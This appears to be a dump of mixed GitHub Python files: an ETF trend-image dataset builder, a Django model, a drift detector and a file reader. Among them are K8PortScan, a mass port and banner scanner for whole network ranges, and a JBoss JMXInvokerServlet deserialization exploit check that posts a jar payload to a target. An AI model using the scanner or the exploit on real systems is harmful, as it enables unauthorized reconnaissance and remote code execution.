max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
Chapter06/6B_TrendFollowings/6B_1_trendFollowing.py | uyenphuong18406/Hands-On-Artificial-Intelligence-for-Banking | 115 | 12728009 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
QUANDLKEY = '<ENTER YOUR QUANDLKEY HERE>'
"""
Created on Thu Oct 25 23:19:44 2018
@author: jeff
"""
'''*************************************
#1. Import libraries and key varable values
'''
import quandl
import plotly
import plotly.graph_objs as go
import numpy as np
from datetime import datetime
try:
import Image
except ImportError:
from PIL import Image
import os
import h5py
#dates parameters
str_dte = '2003-01-01'
end_dte = '2018-7-31'
date_dict = {'gte':str_dte, 'lte':end_dte}
#quandl setting
quandl.ApiConfig.api_key = QUANDLKEY
col_num_mid = 10
col_num_dte = 9
#parameters for the image generation
pixel_size = 100
window_size = 60
pred_window_size = 1
num_channel = 1
#create path for the output dataset
folder_path = os.path.dirname(__file__)
data_X_dir = os.path.join(folder_path,'dataset')
data_Y_dir = os.path.join(folder_path,'dataset')
#ticker lists
#tkr_list = ['TIPX','HYMB','TFI','ULST','MBG','FLRN','SHM','STOT','SPTS','BIL','SPSB']
tkr_list = ['DWX','TIPX','FLRN','CBND','SJNK','SRLN','CJNK','DWFI','EMTL','STOT','TOTL','DIA','SMEZ','XITK','GLDM','GLD','XKFS','XKII','XKST','GLDW','SYE','SYG','SYV','LOWC','ZCAN','XINA','EFAX','QEFA','EEMX','QEMM','ZDEU','ZHOK','ZJPN','ZGBR','QUS','QWLD','OOO','LGLV','ONEV','ONEO','ONEY','SPSM','SMLV','MMTM','VLU','SPY','SPYX','SPYD','SPYB','WDIV','XWEB','MDY','NANR','XTH','SHE','GAL','INKM','RLY','ULST','BIL','CWB','EBND','JNK','ITE','IBND','BWX','SPTL','MBG','BWZ','IPE','WIP','RWO','RWX','RWR','FEZ','DGT','XNTK','CWI','ACIM','TFI','SHM','HYMB','SPAB','SPDW','SPEM','SPIB','SPLG','SPLB','SPMD','SPSB','SPTS','SPTM','MDYG','MDYV','SPYG','SPYV','SLY','SLYG','SLYV','KBE','KCE','GII','KIE','KRE','XAR','XBI','GXC','SDY','GMF','EDIV','EWX','GNR','XHE','XHS','XHB','GWX','XME','XES','XOP','XPH','XRT','XSD','XSW','XTL','XTN','FEU','PSK']
#generate png file for each of the input or now
img_output =False
#generate interactive plot to the ticket stock price or not
gen_plot = False
'''*************************************
#2. Define the function to rescale the stock price according to the min and max values
'''
#input_X is a series of price
#output_X is a series of price expressed in pixel
def rescale(input_X, pixel, min_x,max_x):
unit = (max_x - min_x)/pixel
output_X = round((input_X-min_x)/unit,0)
return output_X,unit
'''*************************************
#3. Go through the tickers
'''
for tkr in tkr_list:
print(tkr)
#if the ticker has been downloaded, skip the ticket and go for the next one
if os.path.exists(tkr+'6b1_completed.txt'):
continue
#download and create dataset
df =quandl.get_table('SHARADAR/SFP',date=date_dict,ticker=tkr)
#sort the date from ascending to descending...
df = df.sort_values(by=['date'])
df=df.reset_index(drop=True)
#charting interactive chart for viewing the data
if gen_plot == True:
trace = go.Candlestick(x=df.date,
open=df.open,
high=df.high,
low=df.low,
close=df.close)
data = [trace]
plotly.offline.plot(data, filename=tkr+'simple_candlestick')
#calculate mid price of the day
df['mid'] = (df['high'] + df['low'])/2
len_df = len(df)
num_img = max(int(len_df-window_size-1),0)
current_min_dte = df.date
train_shape = (num_img, pixel_size, window_size,num_channel)
label_shape = (num_img, pixel_size)
#remove the file if there is one
data_X_path = os.path.join(data_X_dir,tkr+'X_img.h5')
try:
os.remove(data_X_path)
except OSError:
pass
h5f_X = h5py.File(data_X_path,'w')
#remove the file if there is one
data_Y_path = os.path.join(data_Y_dir,tkr+'Y_label.h5')
try:
os.remove(data_Y_path)
except OSError:
pass
h5f_Y = h5py.File(data_Y_path,'w')
#create dataset within the HDF5 file
#now we create the dataset with a fixed size to fit all the data, it could also be create to fit fixed batches
h5f_X.create_dataset("X_img_ds", train_shape, np.float32)
h5f_Y.create_dataset("Y_label_ds", label_shape, np.float32)
#loop through the dates
for i in range(num_img):
img_ar = np.zeros((pixel_size,window_size,1))
result_Y =np.zeros((pixel_size))
df_plot = df.iloc[i:window_size+i,:]
#create min and max values for the mid price plot within a given timeframe
min_p = min(df_plot['mid'])
max_p = max(df_plot['mid'])
output_pixel,unit = rescale(df_plot['mid'],pixel_size,min_p,max_p)
df_next = df.iloc[window_size+i+1,:]
next_p = df_next['mid']
unit = max(unit,0.000001)
next_p_val = max(round((min(next_p,max_p)-min_p)/unit,0),0)
#in case of low liquidity ETF which has the same price, no graph be drawn
if min_p ==max_p:
continue
k = 0
#draw the dot on the x, y axis of the input image array
for pix in output_pixel:
img_ar[int(pix)-1][k][0] = 255
k+=1
#output the image for visualization
if img_output:
img = Image.fromarray(img_ar)
if img.mode != 'RGB':
new_img = img.convert('RGB')
file_path = os.path.join(folder_path,'img/'+tkr+str(i)+'.png')
new_img.save(file_path,"PNG")
img_row = img_ar/255
#draw the dot on the target image for training
result_Y[int(next_p_val)-1] = 255
result_Y_row=result_Y/255
#stack up for a numpy for Image Recognition
h5f_X["X_img_ds"][i, ...] = img_row
h5f_Y["Y_label_ds"][i, ...] = result_Y_row
if i == 0:
np_X = img_row
np_Y = result_Y_row
else:
np_X = np.vstack((np_X,img_row))
np_Y = np.vstack((np_Y,result_Y_row))
f_tkr=open(tkr+'6b1_completed.txt','w+')
f_tkr.close()
h5f_X.close()
h5f_Y.close()
#generate the message to the directory to signal the completion of this task
f=open('6b1_completed.txt','w+')
f.close()
|
example/books/models.py | spapas/django-generic-scaffold | 106 | 12728048 | from __future__ import unicode_literals
try:
from django.core.urlresolvers import reverse
except ModuleNotFoundError:
from django.urls import reverse
from django.db import models
import generic_scaffold
class Book(models.Model):
title = models.CharField(max_length=128)
author = models.CharField(max_length=128)
category = models.CharField(max_length=32)
def get_absolute_url(self):
return reverse(self.detail_url_name, args=[self.id])
def __str__(self):
return '{0} {1} {2}'.format(self.title, self.author, self.category)
|
asterocr/text_rec/loss/__init__.py | ankur6ue/aster-ocr | 605 | 12728061 | from __future__ import absolute_import
from .sequenceCrossEntropyLoss import SequenceCrossEntropyLoss
__all__ = [
'SequenceCrossEntropyLoss',
] |
src/sage/crypto/mq/sbox.py | bopopescu/sage | 1,742 | 12728063 | <filename>src/sage/crypto/mq/sbox.py
from sage.misc.lazy_import import lazy_import
lazy_import('sage.crypto.sbox', ['SBox',
'feistel_construction',
'misty_construction'],
deprecation=22986)
|
K8PortScan.py | VCStardust/K8tools | 4,611 | 12728081 | import socket, sys
import threading
import argparse
import time
##Code: https://github.com/k8gege/K8PortScan
##K8portScan 1.0
##Date: 20190530
##Author: K8gege
##Usage:
##IP (IP IP/24 IP/16 IP/8)
##
##python K8PortScan.py -ip 172.16.17.32
##python K8PortScan.py -ip 172.16.17.32 -p 80-89
##python K8PortScan.py -ip 172.16.17.32/24 -p 80,445,3306
##
##IPlist (ip.txt ip24.txt ip16.txt ip8.txt)
##python K8PortScan.py -f ip.txt
##python K8PortScan.py -f ip.txt -p 80-89
##python K8PortScan.py -f ip24.txt -p 80,445,3306
def getPortBanner(ip, p):
try:
port=int(p)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if port==3306 or port==22 or port==23 or port==1521:
s.settimeout(5)
else:
s.settimeout(0.2)
s.connect((ip, port))
s.send('HELLO\r\n')
#print ip+"\t"+p+" Open"
print ip+"\t"+p+" Open\t"+s.recv(1024).split('\r\n')[0].strip('\r\n')
except Exception as e:
#print e
pass
finally:
s.close()
def GetPortsBanner(ip,ports):
for p in ports:
#print p
banner=getPortBanner(ip,str(p))
# if banner!=None:
# print ip+"\t"+banner
def CscanPortBanner(ip,ports):
if '/24' in ip:
print 'ip/24: '+ip
ipc = (ip.split('.')[:-1])
for i in range(1,256):
ip = ('.'.join(ipc)+'.'+str(i))
threading._start_new_thread(GetPortsBanner,(ip,ports,))
time.sleep(0.1)
else:
GetPortsBanner(ip,ports)
def BscanPortBanner(ip,ports):
if '/16' in ip:
print 'ip/16: '+ip
ipc = (ip.split('.')[:-2])
for i in range(1,256):
ip = ('.'.join(ipc)+'.'+str(i)+'.0/24')
CscanPortBanner(ip,ports)
def AscanPortBanner(ip,ports):
if '/8' in ip:
print 'ip/8: '+ip
ipc = (ip.split('.')[:-3])
for i in range(1,256):
ip = ('.'.join(ipc)+'.'+str(i)+'.0/16')
BscanPortBanner(ip,ports)
if __name__ == '__main__':
print('K8PortScan 1.0')
parser = argparse.ArgumentParser()
parser.add_argument('-ip',help='IP or IP/24')
parser.add_argument('-f', dest="ip_file", help="ip.txt ip24.txt ip16.txt ip8.txt")
parser.add_argument('-p', dest='port', type=str, help="Example: 80 80-89 80,443,3306,8080")
args = parser.parse_args()
ip=args.ip
tmpPorts = args.port
ipfile=args.ip_file
if ip==None and ipfile==None:
print 'Error: ip or ipfile is Null!'
print 'Help: -h or --help'
sys.exit(1)
if tmpPorts:
if ',' in tmpPorts:
ports = tmpPorts.split(',')
elif '-' in tmpPorts:
ports = tmpPorts.split('-')
tmpports = []
[tmpports.append(i) for i in range(int(ports[0]), int(ports[1]) + 1)]
ports = tmpports
else:
ports = [tmpPorts]
else:
print 'Default Ports'
ports = [21, 22, 23, 53, 80, 111, 139, 161, 389, 443, 445, 512, 513, 514,
873, 1025, 1433, 1521, 3128, 3306, 3311, 3312, 3389, 5432, 5900,
5984, 6082, 6379, 7001, 7002, 8000, 8080, 8081, 8090, 9000, 9090,
8888, 9200, 9300, 10000, 11211, 27017, 27018, 50000, 50030, 50070]
if ipfile!=None:
iplist = []
with open(str(ipfile)) as f:
while True:
line = str(f.readline()).strip()
if line:
iplist.append(line)
else:
break
if ipfile=='ip24.txt':
print 'Scan iplist/24'
for ip in iplist:
CscanPortBanner(ip+'/24',ports)
elif ipfile=='ip16.txt':
print 'Scan iplist/16'
for ip in iplist:
BscanPortBanner(ip+'/16',ports)
elif ipfile=='ip8.txt':
print 'Scan iplist/8'
for ip in iplist:
AscanPortBanner(ip+'/8',ports)
# elif ipfile=='ip.txt':
# print 'iplist'
else:
print 'Scan iplist (any txt file)'
for ip in iplist:
CscanPortBanner(ip,ports)
elif ip!=None:
if '/16' in ip:
BscanPortBanner(ip,ports)
elif '/8' in ip:
AscanPortBanner(ip,ports)
elif '/24' in ip:
CscanPortBanner(ip,ports)
else:
CscanPortBanner(ip,ports)
|
middileware/jboss/jboss_unrce.py | xin053/PocCollect | 340 | 12728107 | <filename>middileware/jboss/jboss_unrce.py
#coding:utf-8
import urllib2
import binascii
import time
from t import T
def readfile(path):
data=None
file_object = open(path,'rb')
try:
data = file_object.read( )
finally:
file_object.close( )
return data
class P(T):
def __init__(self):
T.__init__(self)
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
timeout=3
target_url = 'http://'+ip+':'+port
result = {}
result['result']=False
res=None
vul_url = target_url+"/invoker/JMXInvokerServlet"
import os
upload_jar = readfile(os.path.split(os.path.realpath(__file__))[0]+'/upload.jar')
vul_test=readfile(os.path.split(os.path.realpath(__file__))[0]+'/vultest.dat')
try:
urllib2.urlopen(vul_url,upload_jar)
res = urllib2.urlopen(vul_url,vul_test)
if 'vultest11111' in res.read():
info= vul_url +" Jboss Unserialization vul"
result['result']=True
result['VerifyInfo'] = {}
result['VerifyInfo']['type']='Jboss Unserialization vul'
result['VerifyInfo']['URL'] =target_url
result['VerifyInfo']['payload']=vul_url
result['VerifyInfo']['result'] =info
return result
except Exception,e:
return result
finally:
if res is not None:
res.close()
del upload_jar
del vul_test
if __name__ == '__main__':
print P().verify(ip='172.16.58.3',port='8080') |
torchdrift/detectors/partial_mmd.py | TorchDrift/TorchDrift | 200 | 12728129 | <gh_stars>100-1000
from typing import Optional
import torch
from .mmd import GaussianKernel
from .detector import Detector
import torchdrift
import warnings
def partial_kernel_mmd_twostage(x, y, n_perm=None,
kernel=GaussianKernel(),
fraction_to_match=1.0, wasserstein_p=2.0):
"""Partial kernel MMD using a Wasserstein coupling to obtain the weight for the reference.
"""
torchdrift.utils.check(
n_perm is None,
"Bootstrapping within partial MMD is not implemented, use bootstrap during fit",
error_class=NotImplementedError
)
n, d = x.shape
m, d2 = y.shape
if fraction_to_match < 1.0:
_, coupling = torchdrift.detectors.wasserstein(
x, y,
fraction_to_match=fraction_to_match, return_coupling=True, n_perm=None,
p=wasserstein_p)
w = coupling[:, :-1].sum(1).to(device=x.device, dtype=x.dtype) / fraction_to_match
else:
w = torch.full((n,), 1.0 / n, device=x.device, dtype=x.dtype)
torchdrift.utils.check(d == d2, "feature dimension mismatch")
xy = torch.cat([x.detach(), y.detach()], dim=0)
dists = torch.cdist(xy, xy, p=2.0)
# we are a bit sloppy here as we just keep the diagonal and everything twice
k = kernel(dists)
k_x = k[:n, :n]
k_y = k[n:, n:]
k_xy = k[:n, n:]
# The diagonals are always 1 (up to numerical error, this is (3) in Gretton et al.)
mmd = (w @ k_x) @ w + k_y.sum() / (m * m) - 2 * (w @ k_xy).sum() / m
return mmd
def partial_kernel_mmd_qp(x, y, n_perm=None, kernel=GaussianKernel(),
fraction_to_match=1.0):
"""Partial Kernel MMD using quadratic programming.
This is very slow and mainly intended for reference purposes.
You need to install qpsolvers to use this function."""
torchdrift.utils.check(
n_perm is None,
"Bootstrapping within partial MMD is not implemented, use bootstrap during fit",
error_class=NotImplementedError
)
import qpsolvers
n, d = x.shape
m, d2 = y.shape
torchdrift.utils.check(d == d2, "feature dimension mismatch")
xy = torch.cat([x.detach(), y.detach()], dim=0)
dists = torch.cdist(xy, xy, p=2.0)
# we are a bit sloppy here as we just keep the diagonal and everything twice
k = kernel(dists.double())
k_x = k[:n, :n]
k_y = k[n:, n:]
k_xy = k[:n, n:]
v = torch.full((m,), 1 / m, dtype=k_y.dtype, device=k_y.device)
R = torch.cholesky(k_x, upper=True)
d = torch.inverse(R.t()) @ (k_xy.sum(1) / m)
lb = torch.zeros((n,), dtype=k_x.dtype, device=k_x.device)
ub = torch.full((n,), 1.0 / (n * fraction_to_match), dtype=k_x.dtype, device=k_x.device)
w = qpsolvers.solve_ls(R.cpu().numpy(), d.cpu().numpy(),
lb=lb.cpu().numpy(), ub=ub.cpu().numpy(),
A=torch.ones((1, n,), dtype=R.dtype).numpy(),
b=torch.ones((1,), dtype=R.dtype).numpy())
torchdrift.utils.check(
w is not None,
'QP failed to find a solution (numerical accuracy with the bounds?)'
)
w = torch.as_tensor(w, device=k_x.device, dtype=k_x.dtype)
mmd = (w @ k_x) @ w + k_y.sum() / (m * m) - 2 * (w @ k_xy).sum() / m
return mmd
def partial_kernel_mmd_approx(
x, y,
fraction_to_match=1.0,
kernel=GaussianKernel(),
n_perm=None):
torchdrift.utils.check(
n_perm is None,
"Bootstrapping within partial MMD is not implemented, use bootstrap during fit",
error_class=NotImplementedError
)
rng = torch.Generator(device=x.device).manual_seed(1234)
n, d = x.shape
m, d2 = y.shape
torchdrift.utils.check(d == d2, "feature dimension mismatch")
xy = torch.cat([x.detach(), y.detach()], dim=0)
dists = torch.cdist(xy, xy, p=2.0)
k = kernel(dists.double())
k_x = k[:n, :n]
k_y = k[n:, n:]
k_xy = k[:n, n:]
w = torch.full((n,), 1.0 / n, dtype=k_x.dtype, device=k_x.device, requires_grad=False)
mmd = (w @ k_x) @ w + k_y.sum() / (m * m) - 2 * (w @ k_xy).sum() / m
for i in range(100):
r = torch.rand((), device=x.device, dtype=x.dtype, generator=rng) + 0.5
grad_mmd = (k_x @ w) - (k_xy).mean(1)
grad_mmd_min = grad_mmd[(w < 1.0 / (n * fraction_to_match))]
if grad_mmd_min.size(0) > 0:
grad_mmd_min = grad_mmd_min.min()
else:
grad_mmd_min = torch.zeros_like(r)
grad_mmd_max = grad_mmd[(w > 0)]
if grad_mmd_max.size(0) > 0:
grad_mmd_max = grad_mmd_max.max()
else: # pragma: no cover
grad_mmd_max = torch.zeros_like(r)
active_mask = (((w > 0) | (grad_mmd < grad_mmd_min * r))
& ((w < 1.0 / (n * fraction_to_match)) | (grad_mmd > grad_mmd_max * r)))
H_mmd_active = k_x[active_mask][:, active_mask]
if H_mmd_active.size(0) == 0:
continue
u = torch.cholesky(H_mmd_active)
Hinvgr = torch.cholesky_solve(grad_mmd[active_mask][:, None], u).squeeze(1)
w_active = w[active_mask]
Hinvgr -= Hinvgr.mean()
Hinvgr_full = torch.zeros_like(w)
Hinvgr_full[active_mask] = Hinvgr
step = 1.0
for j in range(5):
w_cand = w.clone()
w_cand -= step * Hinvgr_full
w_cand.clamp_(min=0, max=1.0 / (n * fraction_to_match))
w_cand /= w_cand.sum()
mmd_cand = (w_cand @ k_x) @ w_cand + k_y.sum() / (m * m) - 2 * (w_cand @ k_xy).sum() / m
is_lower = (mmd_cand < mmd)
mmd = torch.where(is_lower, mmd_cand, mmd)
w = torch.where(is_lower, w_cand, w)
step /= 5
grad_mmd = 2 * (k_x @ w) - 2 * (k_xy).mean(1)
grad_mmd_min = grad_mmd[(w < 1.0 / (n * fraction_to_match))]
if grad_mmd_min.size(0) > 0:
grad_mmd_min = grad_mmd_min.min()
else:
grad_mmd_min = torch.zeros_like(r)
grad_mmd_max = grad_mmd[(w > 0)]
if grad_mmd_max.size(0) > 0:
grad_mmd_max = grad_mmd_max.max()
else: # pragma: no cover
grad_mmd_max = torch.zeros_like(r)
active_mask = (((w > 0) | (grad_mmd < grad_mmd_min * r)) &
((w < 1.0 / (n * fraction_to_match)) | (grad_mmd > grad_mmd_max * r)))
step = 1e-1
for j in range(5):
w_candnd = w.clone()
grad_mmd_x = grad_mmd.clone()
grad_mmd_x = torch.where(active_mask,
grad_mmd_x,
torch.zeros((), device=grad_mmd_x.device,
dtype=grad_mmd_x.dtype))
grad_mmd_x = torch.where(active_mask,
grad_mmd_x,
grad_mmd_x - grad_mmd_x.mean())
w_cand -= step * grad_mmd_x
w_cand.clamp_(min=0, max=1.0 / (n * fraction_to_match))
w_cand /= w_cand.sum()
mmd_cand = (w_cand @ k_x) @ w_cand + k_y.sum() / (m * m) - 2 * (w_cand @ k_xy).sum() / m
is_lower = (mmd_cand < mmd)
mmd = torch.where(is_lower, mmd_cand, mmd)
w = torch.where(is_lower, w_cand, w)
step = step / 5
return mmd
class PartialKernelMMDDriftDetector(Detector):
"""Drift detector based on the partial MMD Distance.
(see <NAME>: Partial Wasserstein and Maximum Mean Discrepancy distances
for bridging the gap between outlier detection and drift detection,
https://arxiv.org/abs/2106.01289 )
Note: We recommend using dtype double as input for now.
Args:
fraction_to_match: fraction of x probability mass to be matched
n_perm: number of bootstrap permutations to run to compute p-value (None for not returning a p-value)
method: PartialKernelMMDDriftDetector.METHOD_TWOSTAGE, METHOD_APPROX, or METHOD_QP
"""
METHOD_TWOSTAGE = 1
METHOD_APPROX = 2
METHOD_QP = 3
def __init__(
self, *, return_p_value=False, n_perm=1000, fraction_to_match=1.0,
kernel=GaussianKernel(),
method=METHOD_TWOSTAGE,
):
super().__init__(return_p_value=return_p_value)
self.fraction_to_match = fraction_to_match
self.kernel = kernel
self.n_perm = n_perm
self.n_test = None
self.scores = None
if method == PartialKernelMMDDriftDetector.METHOD_TWOSTAGE:
self.partial_mmd = partial_kernel_mmd_twostage
elif method == PartialKernelMMDDriftDetector.METHOD_APPROX:
self.partial_mmd = partial_kernel_mmd_approx
elif method == PartialKernelMMDDriftDetector.METHOD_QP:
self.partial_mmd = partial_kernel_mmd_qp
else: # pragma: no cover
raise RuntimeError("Invalid Partial MMD method")
def fit(self, x: torch.Tensor, n_test: Optional[int] = None):
"""Record a sample as the reference distribution
Args:
x: The reference data
n_test: If an int is specified, the last n_test datapoints
will not be considered part of the reference data. Instead,
bootstrappin using permutations will be used to determine
the distribution under the null hypothesis at fit time.
Future testing must then always be done with n_test elements
to get p-values.
"""
x = x.detach()
if n_test is None:
self.base_outputs = x
else:
torchdrift.utils.check(0 < n_test < x.size(0), "n_test must be strictly between 0 and the number of samples")
self.n_test = n_test
self.base_outputs = x[:-n_test]
n_ref = x.size(0) - n_test
with_distant_point = self.fraction_to_match < 1.0
scores = []
for i in range(self.n_perm):
slicing = torch.randperm(x.size(0))
scores.append(self.partial_mmd(x[slicing[:-n_test]], x[slicing[-n_test:]], fraction_to_match=self.fraction_to_match, kernel=self.kernel))
scores = torch.stack(scores)
self.scores = scores
self.dist_min = scores.min().double()
mean = scores.mean() - self.dist_min
var = scores.var().double()
self.dist_alpha = mean**2 / var
self.dist_beta = mean / var
self.scores = scores
return x
def predict_shift_from_features(
self,
base_outputs: torch.Tensor,
outputs: torch.Tensor,
compute_score: bool,
compute_p_value: bool,
individual_samples: bool = False,
):
torchdrift.utils.check(
not individual_samples, "Individual samples not supported by Wasserstein distance detector"
)
if not compute_p_value:
ood_score = self.partial_mmd(
base_outputs, outputs, fraction_to_match=self.fraction_to_match,
n_perm=None,
)
p_value = None
else:
torchdrift.utils.check(
self.n_test is not None,
"Bootstrapping within partial MMD is not implemented, use bootstrap during fit",
error_class=NotImplementedError
)
torchdrift.utils.check(self.n_test == outputs.size(0),
"number of test samples does not match calibrated number")
ood_score = self.partial_mmd(
base_outputs, outputs, fraction_to_match=self.fraction_to_match,
n_perm=None)
p_value = torch.igammac(self.dist_alpha, self.dist_beta * (ood_score - self.dist_min).clamp_(min=0)) # needs PyTorch >=1.8
# z = (ood_score - self.dist_mean) / self.dist_std
# p_value = 0.5 * torch.erfc(z * (0.5**0.5))
# p_value = (self.scores > ood_score).float().mean()
return ood_score, p_value
|
plotdevice/util/readers.py | plotdevice/plotdevice | 110 | 12728133 | <filename>plotdevice/util/readers.py
# encoding: utf-8
import os, sys, re
from operator import attrgetter
PY2 = sys.version_info[0] == 2
# files & io
from io import open, StringIO, BytesIO
from os.path import abspath, dirname, exists, join, splitext
from plotdevice import DeviceError, INTERNAL
text_type = str if not PY2 else unicode
# data formats
import json, csv
from collections import namedtuple, defaultdict
from codecs import iterencode, iterdecode
from xml.parsers import expat
# http
from urlparse import urlparse
from Foundation import NSDateFormatter, NSLocale, NSTimeZone, NSDate
### XML handling ###
Element = namedtuple('Element', ['tag', 'attrs', 'parents', 'start', 'end'])
escapes = [('break','0C'), ('indent', '09'), ('flush', '08')]
doctype = '<!DOCTYPE plod [ %s ]>' % "".join(['<!ENTITY %s "à%s;" >'%e for e in escapes])
HEAD = u"%s<%s>" % (doctype, INTERNAL)
TAIL = u"</%s>" % INTERNAL
class XMLParser(object):
_log = 0
def __init__(self, txt, offset=0):
# configure the parsing machinery/callbacks
p = expat.ParserCreate()
p.StartElementHandler = self._enter
p.EndElementHandler = self._leave
p.CharacterDataHandler = self._chars
self._expat = p
# shift the range values in .nodes by offset (in case we're appending)
self._offset = offset
# set up state attrs to record the parse results
self.stack = []
self.cursor = offset
self.regions = defaultdict(list)
self.nodes = defaultdict(list)
self.body = []
# wrap everything in a root node (and include the whitespace entities which shift
# the tty escapes into the unicode PUA for the duration)
if isinstance(txt, text_type):
txt = txt.encode('utf-8')
self._xml = HEAD.encode('utf-8') + txt + TAIL.encode('utf-8')
# parse the input xml string
try:
self._expat.Parse(self._xml, True)
except expat.ExpatError, e:
self._expat_error(e)
@property
def text(self):
# returns the processed string (with all markup removed and tty-escapes un-shifted)
return u"".join(self.body).translate({0xE000+v:v for v in (8,9,12)})
def _expat_error(self, e):
# correct the column and line-string for our wrapper element
col = e.offset
err = u"\n".join(e.args)
line = self._xml.decode('utf-8').split("\n")[e.lineno-1]
if line.startswith(HEAD):
line = line[len(HEAD):]
col -= len(HEAD)
err = re.sub(ur'column \d+', 'column %i'%col, err)
if line.endswith(TAIL):
line = line[:-len(TAIL)]
# move the column range with the typo into `measure` chars
measure = 80
snippet = line
if col>measure:
snippet = snippet[col-measure:]
col -= col-measure
snippet = snippet[:max(col+12, measure-col)]
col = min(col, len(snippet))
# show which ends of the line are truncated
clipped = [snippet]
if not line.endswith(snippet):
clipped.append(u'...')
if not line.startswith(snippet):
clipped.insert(0, u'...')
col+=3
caret = u' '*(col-1) + u'^'
# raise the exception
msg = u'Text: ' + err
stack = u'stack: ' + u" ".join(['<%s>'%elt.tag for elt in self.stack[1:]]) + u' ...'
xmlfail = u"\n".join([msg, u"".join(clipped), caret, stack])
raise DeviceError(xmlfail)
def log(self, s=None, indent=0):
if not isinstance(s, basestring):
if s is None:
return self._log
self._log = int(s)
return
if not self._log: return
if indent<0: self._log-=1
msg = (u' '*self._log)+(s if s.startswith('<') else repr(s)[1:])
print msg.encode('utf-8')
if indent>0: self._log+=1
def _enter(self, name, attrs):
parents = tuple(reversed([e.tag for e in self.stack[1:]]))
elt = Element(name, attrs, parents, self.cursor, end=None)
self.stack.append(elt)
self.log(u'<%s>'%(name), indent=1)
def _chars(self, data):
selector = tuple([e.tag for e in self.stack])
# handle special case where a self-closed tag precedes a '\n'
if hasattr(self, '_crlf'):
if data == "\n":
selector = selector + (self._crlf.tag,)
del self._crlf
self.regions[selector].append(tuple([self.cursor-self._offset, len(data)]))
self.cursor += len(data)
self.body.append(data)
self.log(data)
def _leave(self, name):
node = self.stack.pop()._replace(end=self.cursor)
# hang onto line-ending self-closed tags so they can be applied to the next '\n' in _chars
if node.start==node.end:
at = self._expat.CurrentByteIndex
if self._xml[at-2:at]=='/>' and self._xml[at:at+1]=="\n":
node = node._replace(end=node.start+1)
self._crlf = node
self.nodes[name].append(node)
self.log(u'</%s>'%(name), indent=-1)
# if we've exited the root node, clean up the parsed elements
if name == INTERNAL:
del self.nodes[INTERNAL]
self.nodes = {tag:sorted(elts, key=attrgetter('start')) for tag,elts in self.nodes.items()}
### CSV unpacking ###
def csv_rows(file_obj, dialect=csv.excel, **kwargs):
csvfile = iterencode(file_obj, 'utf-8') if PY2 else file_obj
csvreader = csv.reader(csvfile, dialect=dialect, **kwargs)
csvreader = (list(iterdecode(i, 'utf-8')) for i in csvreader) if PY2 else csvreader
for row in csvreader:
yield row
def csv_dict(file_obj, dialect=csv.excel, cols=None, dict=dict, **kwargs):
if not isinstance(cols, (list, tuple)):
cols=None
for row in csv_rows(file_obj, dialect, **kwargs):
if not cols:
cols = row
continue
yield dict(zip(cols,row))
def csv_tuple(file_obj, dialect=csv.excel, cols=None, **kwargs):
if not isinstance(cols, (list, tuple)):
cols=None
elif cols:
RowType = namedtuple('Row', cols)
for row in csv_rows(file_obj, dialect, **kwargs):
if not cols:
cols = row
RowType = namedtuple('Row', cols)
continue
yield RowType(**dict(zip(cols, row)))
def csv_dialect(fd):
snippet = fd.read(1024).encode('utf-8') if PY2 else fd.read(1024)
fd.seek(0)
return csv.Sniffer().sniff(snippet)
### HTTP utils ###
try:
import requests
from cachecontrol import CacheControl, CacheControlAdapter
from cachecontrol.caches import FileCache
from cachecontrol.heuristics import LastModified
cache_dir = '%s/Library/Caches/PlotDevice'%os.environ['HOME']
HTTP = CacheControl(requests.Session(), cache=FileCache(cache_dir), heuristic=LastModified())
except ImportError:
class Decoy(object):
def get(self, url):
unsupported = 'could not find the "requests" library (try running "python setup.py build" first)'
raise RuntimeError(unsupported)
HTTP = Decoy()
def binaryish(content, format):
bin_types = ('pdf','eps','png','jpg','jpeg','gif','tiff','tif','zip','tar','gz')
bin_formats = ('raw','bytes','img','image')
if any(b in content for b in bin_types):
return True
if format:
return any(b in format for b in bin_types+bin_formats)
return False
_nsdf = NSDateFormatter.alloc().init()
_nsdf.setLocale_(NSLocale.alloc().initWithLocaleIdentifier_("en_US_POSIX"))
_nsdf.setDateFormat_("EEE',' dd' 'MMM' 'yyyy HH':'mm':'ss zzz")
_nsdf.setTimeZone_(NSTimeZone.timeZoneForSecondsFromGMT_(0))
def last_modified(resp):
"""Return the last modified date as a unix time_t"""
last_mod = _nsdf.dateFromString_(resp.headers.get('Last-Modified'))
if not last_mod:
last_mod = NSDate.date()
return last_mod.timeIntervalSince1970()
### File/URL Reader ###
def read(pth, format=None, encoding=None, cols=None, **kwargs):
"""Returns the contents of a file into a string or format-dependent data
type (with special handling for json and csv files).
The format will either be inferred from the file extension or can be set
explicitly using the `format` arg. Text will be read using the specified
`encoding` or default to UTF-8.
JSON files will be parsed and an appropriate python type will be selected
based on the top-level object defined in the file. The optional keyword
argument `dict` can be set to `adict` or `odict` if you'd prefer not to use
the standard python dictionary for decoded objects.
CSV files will return a list of rows. By default each row will be an ordered
list of column values. If the first line of the file defines column names,
you can call read() with cols=True in which case each row will be a namedtuple
using those names as keys. If the file doesn't define its own column names,
you can pass a list of strings as the `cols` parameter. Rows can be formatted
as column-keyed dictionaries by passing True as the `dict` parameter.
"""
if re.match(r'https?:', pth):
resp = HTTP.get(pth)
resp.raise_for_status()
extension_type = splitext(urlparse(pth).path)[-1]
content_type = resp.headers.get('content-type', extension_type).lower()
for data_t in ['json', 'csv']:
if data_t in content_type:
extension_type = data_t
if binaryish(content_type, format):
fd = BytesIO(resp.content)
else:
if encoding:
resp.encoding = encoding
elif 'charset' not in content_type:
resp.encoding = resp.apparent_encoding
fd = StringIO(resp.text)
else:
enc = encoding or 'utf-8'
extension_type = splitext(pth)[-1].lower()
if binaryish(extension_type, format):
fd = open(os.path.expanduser(pth), 'rb')
else:
fd = open(os.path.expanduser(pth), 'rt', encoding=enc)
if kwargs.get('dict') is True:
kwargs['dict'] = dict
elif kwargs.get('dict') is False:
del kwargs['dict']
dict_type = kwargs.get('dict', dict)
format = (format or extension_type).lstrip('.')
if format=='json':
return json.load(fd, object_pairs_hook=dict_type)
elif format=='csv':
dialect = csv_dialect(fd)
if cols:
if kwargs.get('dict'):
return list(csv_dict(fd, dialect=dialect, cols=cols, dict=dict_type))
else:
